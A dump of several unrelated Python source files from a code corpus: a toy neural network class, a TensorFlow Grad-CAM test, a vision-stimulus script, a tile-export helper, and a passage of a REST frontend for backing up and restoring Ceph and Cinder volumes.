# "kotlin_other_libs.Kluent": 1020,
# "kotlin_other_libs.koin": 1021,
# "kotlin_other_libs.ktlint": 1022,
# "kotlin_other_libs.kscript": 1023,
# "kotlin_other_libs.Spring": 1024,
# "kotlin_other_libs.Spring Boot": 1025,
# "kotlin_other_libs.Vert_x for Kotlin": 1026,
# "kotlin_other_libs.Arrow": 1027,
# "kotlin_other_libs.RxBinding": 1028,
# "kotlin_other_libs.Okio": 1029,
# "kotlin_other_libs.DBFlow": 1030,
# "kotlin_other_libs.Material Dialogs": 1031,
# "kotlin_other_libs.Other": 1032
# },
# "pull_requests": {
# "pull_requests": 519
# }
# }
#
| StarcoderdataPython |
1632539 | from .matrix import Matrix
import math
__all__=["ActivationFunction","NeuralNetwork","SIGMOID","TANH"]
class ActivationFunction:
    """Pairs an activation function with its derivative.

    f  -- the activation itself
    df -- its derivative, expressed in terms of the activation's output
    """
    def __init__(self, f, df):
        self.f = f
        self.df = df
def _sigmoid(v, *_):
    """Logistic activation."""
    return 1 / (1 + math.exp(-v))


def _sigmoid_deriv(v, *_):
    """Derivative of the logistic function, in terms of its output v."""
    return v * (1 - v)


def _tanh(v, *_):
    """Hyperbolic tangent activation."""
    return math.tanh(v)


def _tanh_deriv(v, *_):
    """Derivative of tanh, in terms of its output v."""
    return 1 - (v ** 2)


SIGMOID = ActivationFunction(_sigmoid, _sigmoid_deriv)
TANH = ActivationFunction(_tanh, _tanh_deriv)
class NeuralNetwork:
    """Fully-connected feed-forward network built on the project's Matrix class.

    Layer sizes run input_ -> each entry of hidden -> output; self.wl and
    self.bl hold one weight Matrix and one bias Matrix per non-input layer.
    Every layer uses the sigmoid activation; training is plain gradient
    descent on a single sample at a time.
    """
    def __init__(self,input_,hidden=None,output=None,lr=0.01):
        # Two construction modes: a dict argument restores a serialized
        # network (see toJSON/fromJSON); otherwise build random weights.
        if (type(input_)==dict):
            self.fromJSON(input_)
        else:
            self.i=input_
            # self.h lists every non-input layer size (hidden layers + output)
            self.h=hidden+[output]
            self.wl=[]
            self.bl=[]
            for k in range(0,len(self.h)):
                # s = size of the previous layer, e = size of this layer
                s=(self.i if k==0 else self.h[k-1])
                e=self.h[k]
                self.wl.append(Matrix(e,s).randomize())
                self.bl.append(Matrix(e,1).randomize())
            self.lr=lr
    def predict(self,i):
        """Forward-pass the input list ``i`` through all layers; returns a list."""
        o=Matrix.from_array(i)
        for k in range(0,len(self.h)):
            o=Matrix.mult(self.wl[k],o)
            o=Matrix.add(o,self.bl[k])
            o=o.map(SIGMOID.f)
        return o.to_array()
    def train(self,i,t):
        """One gradient-descent step on a single (input ``i``, target ``t``) pair."""
        def lrn(l1,l2,w,b,e,df,lr):
            # Gradient step for one layer: l1 = layer input, l2 = layer
            # output, e = error propagated to this layer; returns the
            # updated weight and bias matrices.
            g=Matrix.mapN(l2,df)
            g.multN(e)
            g.multS(lr)
            d=Matrix.transpose(l1)
            d=Matrix.mult(g,d)
            w=Matrix.add(w,d)
            b=Matrix.add(b,g)
            return w,b
        i=Matrix.from_array(i)
        # Forward pass, remembering every layer's activation in ol.
        ol=[]
        for k in range(0,len(self.h)):
            s=(i if k==0 else ol[-1])
            o=Matrix.mult(self.wl[k],s)
            o=Matrix.add(o,self.bl[k])
            ol.append(o.map(SIGMOID.f))
        t=Matrix.from_array(t)
        e=Matrix.sub(t,ol[-1])
        # Backward pass from the output layer towards the input.
        for k in range(len(self.h)-1,-1,-1):
            s=(ol[k-1] if k>0 else i)
            self.wl[k],self.bl[k]=lrn(s,ol[k],self.wl[k],self.bl[k],e,SIGMOID.df,self.lr)
            # NOTE(review): the error is back-propagated through the
            # *updated* weights (lw is taken after the lrn step); textbook
            # backprop uses the pre-update weights -- confirm intent.
            lw=Matrix.transpose(self.wl[k])
            e=Matrix.mult(lw,e)
    def train_multiple(self,d,t,log=True):
        """Run ``t`` passes over dataset ``d`` (pairs of input/target lists),
        printing whole-percent progress when ``log`` is True."""
        l=-1
        for i in range(0,t):
            if (log==True and int(i/t*100)>l):
                l=int(i/t*100)
                print(f"{l}% complete...")
            for k in d:
                self.train(k[0],k[1])
    def test(self,d,log=True):
        """Score dataset ``d``: returns a percentage (two decimals) based on
        the mean per-element difference between targets and predictions."""
        if(log==True):
            print("TEST".center(40,"="))
        a=[]
        for k in d:
            o=self.predict(k[0])
            if(log==True):
                print(f"Input: {str(k[0])}\tTarget Output: {str(k[1])}\tOutput: {str(o)}")
            # accumulate per-element differences between target and output
            a+=Matrix.diff(Matrix.from_array(k[1]),Matrix.from_array(o)).to_array()
        return round((1-sum(a)/len(a))*10000)/100
    def toJSON(self):
        """Serialize layout, weights, biases and learning rate to a plain dict."""
        wl=[]
        for k in self.wl:
            wl.append(k.data)
        bl=[]
        for k in self.bl:
            bl.append(k.data)
        json={"i":self.i,"hl":self.h,"wl":wl,"bl":bl,"lr":self.lr}
        return json
    def fromJSON(self,json):
        """Restore network state from a dict previously produced by toJSON."""
        self.i=json["i"]
        self.h=json["hl"]
        self.wl=[]
        for k in json["wl"]:
            # NOTE(review): dimensions are passed as (len(k[0]), len(k)),
            # i.e. (columns, rows) of the stored data -- verify this matches
            # the Matrix(rows, cols) ordering used in __init__.
            self.wl.append(Matrix(len(k[0]),len(k)).fill(k))
        self.bl=[]
        for k in json["bl"]:
            self.bl.append(Matrix(len(k[0]),len(k)).fill(k))
        self.lr=json["lr"]
| StarcoderdataPython |
54003 | # Copyright 2017 Neosapience, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ========================================================================
import unittest
import darkon
import tensorflow as tf
import numpy as np
_classes = 2
def nn_graph(activation):
    """Build the small conv -> dense test graph in the default TF graph.

    Only the input placeholder is returned; the conv/fc layers are created
    for their side effect of populating the default graph, where the tests
    later locate them by op name.
    """
    x = tf.placeholder(tf.float32, (1, 2, 2, 3), 'x_placeholder')
    # label placeholder kept for graph-layout parity; it is never fed
    y = tf.placeholder(tf.int32, name='y_placeholder', shape=[1, 2])
    with tf.name_scope('conv1'):
        conv_out = tf.layers.conv2d(
            inputs=x,
            filters=10,
            kernel_size=[2, 2],
            padding="same",
            activation=activation)
    with tf.name_scope('fc2'):
        flat = tf.layers.flatten(conv_out)
        dense_out = tf.layers.dense(flat, _classes)
        probs = tf.nn.softmax(dense_out)
    return x
class GradcamGuidedBackprop(unittest.TestCase):
    """Checks darkon.Gradcam's guided-backprop behaviour per activation.

    NOTE(review): each test_* method only records its configuration
    (activation_fn, enable_guided_backprop); the graph construction and
    assertions all run in tearDown(), which unittest invokes after every
    test method.  This works, but failures are reported from tearDown
    rather than from the test body -- consider moving the check into a
    helper called by each test.
    """
    def setUp(self):
        # start every test from an empty default graph
        tf.reset_default_graph()
    def tearDown(self):
        # build the toy network with the activation chosen by the test method
        x = nn_graph(activation=self.activation_fn)
        image = np.random.uniform(size=(2, 2, 3))
        with tf.Session() as sess:
            sess.run(tf.global_variables_initializer())
            gradcam_ops = darkon.Gradcam.candidate_featuremap_op_names(sess)
            if self.enable_guided_backprop:
                # constructing Gradcam registers the guided-backprop
                # gradient override on the current graph
                _ = darkon.Gradcam(x, _classes, gradcam_ops[-1])
            g = tf.get_default_graph()
            from_ts = g.get_operation_by_name(gradcam_ops[-1]).outputs
            to_ts = g.get_operation_by_name(gradcam_ops[-2]).outputs
            # drive a strongly negative objective so the plain gradient is
            # non-zero; guided backprop is expected to clip it to all zeros
            max_output = tf.reduce_max(from_ts, axis=3)
            y = tf.reduce_sum(-max_output * 1e2)
            grad = tf.gradients(y, to_ts)[0]
            grad_val = sess.run(grad, feed_dict={x: np.expand_dims(image, 0)})
            if self.enable_guided_backprop:
                self.assertTrue(not np.any(grad_val))
            else:
                self.assertTrue(np.any(grad_val))
    # Each pair below exercises one activation with and without the
    # guided-backprop override.
    def test_relu(self):
        self.activation_fn = tf.nn.relu
        self.enable_guided_backprop = False
    def test_relu_guided(self):
        self.activation_fn = tf.nn.relu
        self.enable_guided_backprop = True
    def test_tanh(self):
        self.activation_fn = tf.nn.tanh
        self.enable_guided_backprop = False
    def test_tanh_guided(self):
        self.activation_fn = tf.nn.tanh
        self.enable_guided_backprop = True
    def test_sigmoid(self):
        self.activation_fn = tf.nn.sigmoid
        self.enable_guided_backprop = False
    def test_sigmoid_guided(self):
        self.activation_fn = tf.nn.sigmoid
        self.enable_guided_backprop = True
    def test_relu6(self):
        self.activation_fn = tf.nn.relu6
        self.enable_guided_backprop = False
    def test_relu6_guided(self):
        self.activation_fn = tf.nn.relu6
        self.enable_guided_backprop = True
    def test_elu(self):
        self.activation_fn = tf.nn.elu
        self.enable_guided_backprop = False
    def test_elu_guided(self):
        self.activation_fn = tf.nn.elu
        self.enable_guided_backprop = True
    def test_selu(self):
        self.activation_fn = tf.nn.selu
        self.enable_guided_backprop = False
    def test_selu_guided(self):
        self.activation_fn = tf.nn.selu
        self.enable_guided_backprop = True
    def test_softplus(self):
        self.activation_fn = tf.nn.softplus
        self.enable_guided_backprop = False
    def test_test_softplus_guided(self):
        self.activation_fn = tf.nn.softplus
        self.enable_guided_backprop = True
    def test_softsign(self):
        self.activation_fn = tf.nn.softsign
        self.enable_guided_backprop = False
    def test_softsign_guided(self):
        self.activation_fn = tf.nn.softsign
        self.enable_guided_backprop = True
| StarcoderdataPython |
class FlowException(Exception):
    """Base class for internal flow-control signalling.

    Validation failures, configuration errors and similar conditions
    should use the standard Python exception types instead.
    """
class StopProcessing(FlowException):
    """Signal that processing of a single item should stop quietly,
    without verbose error logging."""
123196 | <reponame>chrox/RealTimeElectrophy
# Generate random orientation and spatial frequency gratings.
#
# Copyright (C) 2010-2011 <NAME>
#
# See LICENSE.TXT that came with this file.
from __future__ import division
from StimControl.LightStim.SweepSeque import ParamSeque
from StimControl.LightStim.FrameControl import FrameSweep
from StimControl.LightStim.Grating import ParamMapGrating
from StimControl.LightStim.Core import DefaultScreen
from StimControl.LightStim.LightData import dictattr,IndexedParam
# Configure both displays for the sweep -- TODO confirm both are required
# even though the grating below targets only the 'left' viewport.
DefaultScreen(['left','right'])
# Grating parameters shared by every frame of the sweep.
p = dictattr()
# p.ml: presumably mean luminance -- verify against LightStim docs
p.ml = 0.5
# temporal frequency in cycles per second
p.tfreqCycSec = 2.0
# background brightness (black)
p.bgbrightness = 0.0
p.phase0 = 0
p.contrast = 1
# Index the parameter spaces to sweep over; orientation is sampled on
# the 0-180 degree range.
orientation = IndexedParam('orientation_180')
spatial_freq = IndexedParam('spatial_freq')
phase_at_t0 = [None]
# 4 repeats of every (orientation x spatial_freq) combination, 100 ms per
# frame with no blank interval between frames.
param_sequence = ParamSeque(repeat=4, orientation=orientation, spatial_freq=spatial_freq, phase_at_t0=phase_at_t0, frame_duration=0.1, blank_duration=0.0)
random_grating = ParamMapGrating(viewport='left', params=p, sweepseq=param_sequence)
# Run the sweep; FrameSweep drives the stimulus presentation loop.
sweep = FrameSweep()
sweep.add_stimulus(random_grating)
sweep.go()
193857 | import subprocess
from .utils import logging, cwd
logger = logging.getLogger(__name__)
def export_tiles(r_row, vector_data, _):
    """Render one .mbtiles file per vector layer for the given raster row.

    Each vector row's prepared geojsonl file (under ../tmp/vectors) is fed
    to tippecanoe; output lands in ../outputs/data.  The third parameter is
    accepted for caller compatibility and ignored.
    """
    r_id = r_row['id']
    for vector in vector_data:
        key = f"{vector['id']}_{r_id}"
        out_file = cwd / f'../outputs/data/{key}.mbtiles'
        out_file.parent.mkdir(parents=True, exist_ok=True)
        source = cwd / f'../tmp/vectors/{key}.geojsonl'
        args = [
            'tippecanoe',
            '--detect-shared-borders',
            '--drop-densest-as-needed',
            '--force',
            f'--layer={key}',
            '--maximum-zoom=10',
            '--no-tile-size-limit',
            '--read-parallel',
            '--simplify-only-low-zooms',
            f'--output={out_file}',
            source,
        ]
        # tippecanoe is chatty on stderr, so its output is discarded
        subprocess.run(args, stderr=subprocess.DEVNULL)
    logger.info(f'exported {r_id} vector tiles')
| StarcoderdataPython |
1712120 | #!/usr/bin/python
''' The Snappy Frontend
REST commands for:
Backup (backup a volume)
Restore (restore a volume from a backup)
List (view details about submitted Snappy jobs)
are received and processed.
The frontend interacts with the Snappy Database.
If Cinder is being backed up, then credientials for the Cinder (Openstack) DB
are required in the env-snappy-fe.src file.
'''
# Verions:
# 0.5.4: source_type and source_id are required fields for a Backup request
# 0.5.5: restore to a different volume feature added
# 0.5.6: support for S3 target plugin
# 0.5.7: tablesEditor added
# 0.5.7.1: "auth_type" added as a field to Tenants local DB
# 0.5.7.2: authorization checks moved to "authCheck.py"
# 0.5.7.3: check authorization for all Restore requests
# 0.5.7.4: Restore requests can proceed without access to RBD command
# 0.5.7.5: List (Human readable) translates state number to state description
# 0.5.8: support for source_type "localdirectory" added
# 0.5.8.1: the process ID is written to frontend.pid when frontend.py starts
# 0.5.8.2: tablesEditor now supports the "localdirectory" source
# 0.6.0: support for getting Cinder information from an agent
import authCheck
import sqlite3
import sys
import re
import os
import os.path
import subprocess
import json
import web
import distutils.spawn
from snappy_db_utils.replacestatenum import describe_state_column
# web.py routing table: alternating (url-regex, handler-class-name) pairs.
# Regex groups are passed to the handler methods as positional arguments
# (the tenant id, and for the */(.+) patterns also a job id).
URLS = ('/', 'Index',
        '/v2/(.+)/jobs/full', 'FullListV2All',
        '/v2/(.+)/jobs/full/', 'FullListV2All',
        '/v2/(.+)/jobs/full.txt', 'FullListV2All',
        '/v2/(.+)/jobs/full/.txt', 'FullListV2All',
        '/v2/(.+)/jobs/full/(.+)', 'FullListV2Single',
        '/v2/(.+)/jobs/summary', 'SummaryListV2All',
        '/v2/(.+)/jobs/summary/', 'SummaryListV2All',
        '/v2/(.+)/jobs/summary.txt', 'SummaryListV2All',
        '/v2/(.+)/jobs/summary/.txt', 'SummaryListV2All',
        '/v2/(.+)/jobs/summary/(.+)', 'SummaryListV2Single',
        '/v2/(.+)/jobs', 'AddV2',
        '/v2/(.+)/jobs/', 'AddV2',
        '/v2/(.+)/jobs/(.+)', 'RestoreV2')
# Frontend release number; the change history is in the header comments.
VERSION = "0.6.0"
# Health-check payload returned by the index URL.
index_msg = '{"status":"Snappy Frontend is running. Submit REST commands to use.","version":"' + VERSION + '"}'
APP = web.application(URLS, globals())
class Index:
    ''' The index URL: reports that the service is alive '''

    @staticmethod
    def _status_response():
        # GET and POST share the same health-check payload
        return index_msg

    def GET(self):
        return self._status_response()

    def POST(self):
        return self._status_response()
# (full_listing, use_json) -> (script for all jobs, script for a single job)
_LIST_SCRIPTS = {
    (True, True): ("snappy_db_utils/getfulltablejson.py",
                   "snappy_db_utils/getsingletablejson.py"),
    (True, False): ("snappy_db_utils/listall",
                    "snappy_db_utils/listsingle"),
    (False, True): ("snappy_db_utils/getfullsummaryjson.py",
                    "snappy_db_utils/getsinglesummaryjson.py"),
    (False, False): ("snappy_db_utils/listsummary",
                     "snappy_db_utils/listsummarysingle"),
}


def list_main(full_listing, use_json, job_id):
    '''
    Dispatch one of the 8 listing variants of the Snappy DB contents:
    (full/summary) x (JSON/human readable) x (single/all jobs)
    '''
    # `is True` mirrors the original strict checks: any value that is not
    # literally True selects the summary / human-readable variant.
    all_script, single_script = _LIST_SCRIPTS[(full_listing is True,
                                              use_json is True)]
    # job_id == 0 means "list every job"; otherwise job_id is a string id
    # appended as the script's argument.
    if job_id == 0:
        return subprocess.check_output(all_script)
    cmd_str = single_script + " " + job_id
    return subprocess.check_output(cmd_str.split())
def verify_restore_data():
    '''
    Validate the POST body of a restore-to-different-volume request.

    Returns a (status_json, restore_type, restore_id) tuple.  status_json
    is '{"status":"input valid"}' on success and a JSON error message
    otherwise; restore_type/restore_id keep placeholder defaults whenever
    they are missing from the request.
    '''
    # placeholder values returned alongside error statuses
    restore_type = "abc"
    restore_id = "123456789"
    return_str = '{"status":"input valid"}'
    # Make sure the data is in JSON format
    try:
        item_dict = json.loads(web.data())
    except (ValueError, TypeError):
        # json.loads raises ValueError (JSONDecodeError) on malformed text
        # and TypeError on a non-string payload; the previous bare `except:`
        # would also have swallowed unrelated errors such as
        # KeyboardInterrupt.
        return_str = '{"status":"ERROR: valid JSON not found in POST data"}'
        return return_str, restore_type, restore_id
    # Get the restore_type info
    try:
        restore_type = item_dict["restore_type"]
    except KeyError:
        return_str = '{"status":"ERROR: field <restore_type> not found in POST data"}'
        return return_str, restore_type, restore_id
    # Get the restore_id info
    try:
        restore_id = item_dict["restore_id"]
    except KeyError:
        return_str = '{"status":"ERROR: <restore_id> not found in POST data"}'
        return return_str, restore_type, restore_id
    return return_str, restore_type, restore_id
def restore_main(tenant_id, job_id):
    ''' Process a RESTORE command.

    Validates the job id, authenticates the tenant, verifies the target
    volume when the rbd tool is available, and launches either
    restore_to_different_volume or restore_to_original_volume.
    Returns a JSON status string.
    '''
    data = {}
    # job_id placeholders/invalid values short-circuit with an error status
    if "no data" in job_id:
        data['status'] = 'error_msg: no job_id given'
    elif not isPosInt(job_id):
        data['status'] = 'error_msg: job_id ' + job_id + ' is not valid'
    else:
        # a non-empty result from the helper script means the job exists
        cmd_str = "snappy_db_utils/does_snappy_jobid_exist " + job_id
        job_exists_str = subprocess.check_output(cmd_str.split()).strip()
        if len(job_exists_str) > 0:
            cmd_str = "snappy_db_utils/get_jobtype_from_jobid " + job_id
            jobtype = subprocess.check_output(cmd_str.split()).strip()
            # check to see if Authentication is needed
            # and if so, if the credentials are correct
            auth = web.ctx.env.get('HTTP_AUTHORIZATION')
            if authCheck.is_authorized(tenant_id, auth) is False:
                web.header('WWW-Authenticate', 'Basic realm="Snappy Frontend"')
                web.ctx.status = '401 Unauthorized'
                return '{"status":"ERROR: Authentication failed for tenant <' + tenant_id + '>"}'
            # flips to "true" only after the rbd-based sanity checks pass
            rbd_verified = "false"
            # only export (backup) jobs can be restored from
            if "export" in jobtype:
                cmd_str = "snappy_db_utils/get_src_image_from_jobid " + job_id
                image_id = subprocess.check_output(cmd_str.split()).strip()
                ### Restore to a different volume (a POST body was supplied)
                if (len(web.data()) > 0):
                    is_valid, restore_type, restore_id = verify_restore_data()
                    if ("input valid" not in is_valid):
                        return is_valid
                    # NOTE(review): this assignment appears to be unused --
                    # return_str is reassigned before any later use
                    return_str = '{"status":"restore to a different volume"}'
                    # cinder ids are translated to the id of the volume
                    # backing them (currently only rbd-backed is handled)
                    if "cinder_id" in restore_type:
                        cinder_backed_by = cinder_id_to_backing_type(restore_id)
                        if len(cinder_backed_by) < 1:
                            return '{"status":"ERROR: cinder_id <' + restore_id + '> not found"}'
                        elif "rbd" in cinder_backed_by:
                            restore_type = "rbd"
                            restore_id = cinder_id_to_rbd(restore_id)
                    # else if "lvm" in cinder_backed_by
                    # (and other ways to back cinder)
                    # check to see if this restore_type is supported
                    cmd_str = "builder_utils/get_src_id_from_sp_name " + restore_type
                    restore_type_valid = subprocess.check_output(cmd_str.split()).strip()
                    if (len(restore_type_valid) == 0):
                        return '{"status":"error: restore_type <' + restore_type + '> is not supported"}'
                    # do we have access to the rbd command to make verification check on it??
                    if does_cmd_exist("rbd") is True:
                        # check that the volume <restore_id> exists (the volume we are restoring to)
                        cmd_str = "openstack_db_utils/does_rbd_volume_exist.py " + restore_id
                        id_exists = subprocess.check_output(cmd_str.split())
                        if (id_exists.strip() == "false"):
                            return_txt = '{"status":"ERROR: Cannot restore to ' + restore_type
                            return_txt += ' volume <' + restore_id + '> since it does not exist"}'
                            return return_txt
                        # get the size of <restore_id> (the volume we are restoring to)
                        cmd_str = "openstack_db_utils/get_rbd_size_in_bytes.py " + restore_id
                        restore_volume_size = subprocess.check_output(cmd_str.split()).strip()
                        # get the allocated size of the backed up volume
                        cmd_str = "snappy_db_utils/get_alloc_size_from_jobid " + job_id
                        alloc_size = subprocess.check_output(cmd_str.split()).strip()
                        # check that the size <restore_id> is >= allocated size
                        if int(restore_volume_size) < int(alloc_size):
                            return_str = '{"status":"ERROR: Not enough space. Backup is ' + alloc_size
                            return_str += ' bytes but volume to restore to is only ' + restore_volume_size + ' bytes."}'
                            return return_str
                        # if all of those checks are valid, then it is considered "verified"
                        rbd_verified = "true"
                    data['restore_to_volume_id'] = restore_id
                    # Restore to a volume that is not the original one
                    cmd_str = "./restore_to_different_volume "
                    cmd_str += restore_id + " "
                    cmd_str += job_id + " "
                    cmd_str += restore_type
                    new_job_id_str = subprocess.check_output(cmd_str.split())
                # restore to original volume (no POST body)
                else:
                    # do we have access to the "rbd" command to make verification checks on it?
                    if does_cmd_exist("rbd") is True:
                        # first make sure that the original volume still exists
                        # assume it's the same size as it was before
                        cmd_str = "openstack_db_utils/does_rbd_volume_exist.py " + image_id
                        rbd_vol_exists = subprocess.check_output(cmd_str.split())
                        if "true" in rbd_vol_exists:
                            # Restore back to the original volume
                            rbd_verified = "true"
                        # "unknown" means the check could not be performed;
                        # proceed without verification in that case
                        elif "unknown" in rbd_vol_exists:
                            pass
                        else:
                            return_str = '{"status":"ERROR: Request to restore job <' + job_id
                            return_str += '> to the orignal RBD volume <' + image_id
                            return_str += '>, but it does not exist"}'
                            return return_str
                    cmd_str = "./restore_to_original_volume " + image_id + " " + job_id
                    new_job_id_str = subprocess.check_output(cmd_str.split())
                # clean up the output: drop the first line of the helper's
                # output and any trailing newline, leaving just the job id
                new_job_id_str = new_job_id_str.split("\n", 1)[-1].strip("\n")
                data['rbd_verified'] = rbd_verified
                data['status'] = 'Restore submitted'
                data['restore_from_job_id'] = job_id
                data['image_id'] = image_id
                data['job_id'] = new_job_id_str
            else:
                status_str = 'error_msg: job ' + job_id
                status_str += ' is type ' + jobtype
                status_str += '. It must be an export.'
                data['status'] = status_str
        else:
            data['status'] = 'error_msg: job ' + job_id + ' does not exist'
    return_txt = json.dumps(data)
    return return_txt
def no_tenant_error(tenant_name):
    """Build the standard JSON error payload for an unknown tenant."""
    message = '{"status":"error_msg: tenant ' + tenant_name + ' does not exist"}'
    return message
class RestoreV2:
    '''
    Restore a volume given a backup job_id
    Error cases: (1) no job_id given
                 (2) job_id doesn't exist
                 (3) job_id isn't an export
    '''
    def POST(self, tenant_id, job_id):
        ''' Restore is a POST command '''
        # Reject requests for tenants that are not configured.
        if does_tenant_exist(tenant_id) is False:
            return no_tenant_error(tenant_id)
        # All real work (job validation, rbd checks, restore submit)
        # happens in restore_main(); this class is only the URL handler.
        return restore_main(tenant_id, job_id)
# There will be multiple sources that can be backed up as a Ceph RBD volume.
# To do this, we'll need a "layer" that translates from that source's ID
# to the RBD ID that is backing it.
#
# Here we have have:
# - Cinder Volumes
# - Kubernetes Persitent Volume Claims
# - Kubernetes Persistent Volumes
#
def cinder_id_to_backing_type(cinder_id):
    ''' Get the backing type for a Cinder Volume from its ID '''
    # Delegates to the agent-side helper script; output is e.g. "rbd".
    helper = "openstack_db_utils/get_cinder_volume_type_via_agent " + cinder_id
    return subprocess.check_output(helper.split()).strip("\n")
def cinder_id_to_rbd(cinder_id):
    ''' Translate Cinder to RBD '''
    # Asks the agent which RBD image backs this Cinder volume.
    helper = "openstack_db_utils/get_rbd_from_cinder_via_agent " + cinder_id
    return subprocess.check_output(helper.split()).strip("\n")
def rbd_to_rbd(rbd_id):
    ''' Translate RBD to RBD (identity mapping) '''
    # RBD is already the native backing type, so nothing to translate.
    return rbd_id
def kubernetes_pv_to_rbd(kubernetes_pv_id):
    ''' Translate Kubernetes PV to RBD '''
    # The helper script queries the cluster for the PV's backing RBD image.
    helper = "./kubernetes_utils/getRBDfromPV.py " + kubernetes_pv_id
    return subprocess.check_output(helper.split()).strip("\n")
def kubernetes_pvc_to_pv(kubernetes_pvc_id):
    ''' Translate Kubernetes PVC to PV '''
    # A bound PVC maps to exactly one PV; the script prints its name.
    helper = "./kubernetes_utils/getPVfromPVC.py " + kubernetes_pvc_id
    return subprocess.check_output(helper.split()).strip("\n")
def is_int(s):
    """Return True if *s* can be converted to an int, else False.

    Also treats values of non-convertible types (e.g. None, lists) as
    non-integers instead of letting TypeError escape, which the original
    ValueError-only handler did.
    """
    try:
        int(s)
        return True
    except (ValueError, TypeError):
        return False
# the "notes" field is optional, but if it exists, we will pass it do the Snappy DB
def get_localdirectory_notes():
notes_str = "put notes here"
# The data was not in JSON format
try:
item_dict = json.loads(web.data())
except:
return notes_str
try:
notes_str = item_dict["notes"]
except KeyError:
return notes_str
return notes_str
def verify_add_data():
    """Validate the JSON POST body of an Add request.

    Returns a 6-tuple:
        (status_json, source_type, source_id, count, full_interval, delta_interval)
    status_json contains "ERROR" when validation failed; the remaining
    values are the defaults (or partially parsed values) in that case.
    """
    # Make sure than the POST data was passed in as valid JSON
    # and the required data is included
    # default values
    count = "1"
    full_interval = "604800"  # 1 week
    delta_interval = "0"
    sourcetype = "rbd"
    sourceid = "123456789"
    result = '{"status":"input valid"}'
    # If there's no data passed into this command, we'll catch it here.
    # This can happen if a Restore command was sent but there was
    # no job_id given in the URL, since it'll be interpreted as an Add
    if (len(web.data()) == 0):
        return_str = '{"status":"ERROR: Data has length 0"}'
        return return_str, "-1", "-1", "-1", "-1", "-1"
    # The data was not in JSON format
    try:
        item_dict = json.loads(web.data())
    except:
        return_str = '{"status":"ERROR: valid JSON not found in POST data"}'
        return return_str, sourcetype, sourceid, count, full_interval, delta_interval
    # Get the full_interval info (required, must be a positive integer string)
    try:
        full_interval = item_dict["full_interval"]
    except KeyError:
        return_str = '{"status":"ERROR: field <full_interval> not found in POST data"}'
        return return_str, sourcetype, sourceid, count, full_interval, delta_interval
    if is_int(full_interval) is False or int(full_interval) < 1:
        return_str = '{"status":"ERROR: <full_interval> is not a positive integer (' + full_interval + ')"}'
        return return_str, sourcetype, sourceid, count, full_interval, delta_interval
    # Get the delta_interval info (this field is not required)
    try:
        delta_interval = item_dict["delta_interval"]
        if is_int(delta_interval) is False or int(delta_interval) < 1:
            return_str = '{"status":"ERROR: <delta_interval> is not a positive integer (' + delta_interval + ')"}'
            return return_str, sourcetype, sourceid, count, full_interval, delta_interval
    except KeyError:
        pass
    # Get the count info (required, number of backups to retain)
    try:
        count = item_dict["count"]
    except KeyError:
        return_str = '{"status":"ERROR: <count> not found in POST data"}'
        return return_str, sourcetype, sourceid, count, full_interval, delta_interval
    if is_int(count) is False or int(count) < 1:
        return_str = '{"status":"ERROR: <count> is not a positive integer (' + count + ')"}'
        return return_str, sourcetype, sourceid, count, full_interval, delta_interval
    # Get the source type (e.g. rbd, cinder_id, kpv, kpvc, localdirectory)
    try:
        sourcetype = item_dict["source_type"]
    except KeyError:
        return_str = '{"status":"ERROR: <source_type> not found in POST data"}'
        return return_str, sourcetype, sourceid, count, full_interval, delta_interval
    # Get the source ID to back up
    try:
        sourceid = item_dict["source_id"]
    except KeyError:
        return_str = '{"status":"ERROR: <source_id> not found in POST data"}'
        return return_str, sourcetype, sourceid, count, full_interval, delta_interval
    return result, sourcetype, sourceid, count, full_interval, delta_interval
def does_cmd_exist(cmd):
    '''check to see if a command exists before trying to use it'''
    # find_executable returns None when the command is not on PATH
    return distutils.spawn.find_executable(cmd) is not None
class AddV2:
    ''' Add a new backup request to the Snappy Database '''
    def POST(self, tenant_id):
        ''' Add is a POST command '''
        if does_tenant_exist(tenant_id) is False:
            return no_tenant_error(tenant_id)
        # Parse the input
        input_verify, original_source_type, original_source_id, count, full_interval, delta_interval = verify_add_data()
        if "ERROR" in input_verify:
            return input_verify
        # check to see if Authentication is needed
        # and if so, if the credentials are correct
        auth = web.ctx.env.get('HTTP_AUTHORIZATION')
        if authCheck.is_authorized(tenant_id, auth) is False:
            web.header('WWW-Authenticate', 'Basic realm="Snappy Frontend"')
            web.ctx.status = '401 Unauthorized'
            return '{"status":"ERROR: Authentication failed for tenant <' + tenant_id + '>"}'
        data = {}
        source_type = ""
        source_id = ""
        # original_source_type: what is passed in the REST command
        # source_type: what is backed up by Snappy (corresponds to a "source" in the local sqlite DB)
        #
        # Example: if a Cinder ID is passed in, cinder will be the original_source_type
        # but rbd could be the source_type, since that is what is actually backed up
        # the following original_source_type values are currently supported:
        #  - rbd
        #  - cinder_id
        #  - kpv  (Kubernetes Persistent Volume)
        #  - kpvc (Kubernetes Persistent Volume Claim)
        #  - localdirectory
        # the following source_type values are currently supported:
        #  - rbd
        #  - localdirectory
        if (original_source_type == "rbd") or (original_source_type == "localdirectory"):
            source_type = original_source_type
            source_id = original_source_id
        elif (original_source_type == "cinder_id"):
            # find out what Cinder is backed by
            # and what the ID of that backing volume is
            cinder_backing_type = cinder_id_to_backing_type(original_source_id)
            # does this Cinder ID exist
            if len(cinder_backing_type) < 2:
                return '{"status":"Cinder ID <' + original_source_id + '> does not exist"}'
            # is this Cinder ID backed by RBD
            if "rbd" in cinder_backing_type:
                source_type = "rbd"
                source_id = cinder_id_to_rbd(original_source_id)
            # An example of how to add more cinder backing types
            # elif cinder_backing_type == "iscsi":
            #    source_type = iscsi
            #    source_id = cinder_to_iscsi(original_source_id)
            else:
                # BUG FIX: this branch referenced an undefined name 'cid'
                # (NameError at runtime); use the Cinder ID that was passed in.
                return_txt = '{"status":"Cinder ID <' + original_source_id + '> is backed by ' + cinder_backing_type + ', which is not supported'
                # BUG FIX: the original test `("Null" or "null" in x)` was
                # always truthy ("Null" is a non-empty string); check both
                # spellings against the backing type explicitly.
                if "Null" in cinder_backing_type or "null" in cinder_backing_type:
                    return_txt += '. The Cinder volume may have been deleted'
                return_txt += ' "}'
                return return_txt
        elif (original_source_type == "kpv" or original_source_type == "kpvc"):
            # find out what the Kubernetes Persistent Volume (Claim) is backed by
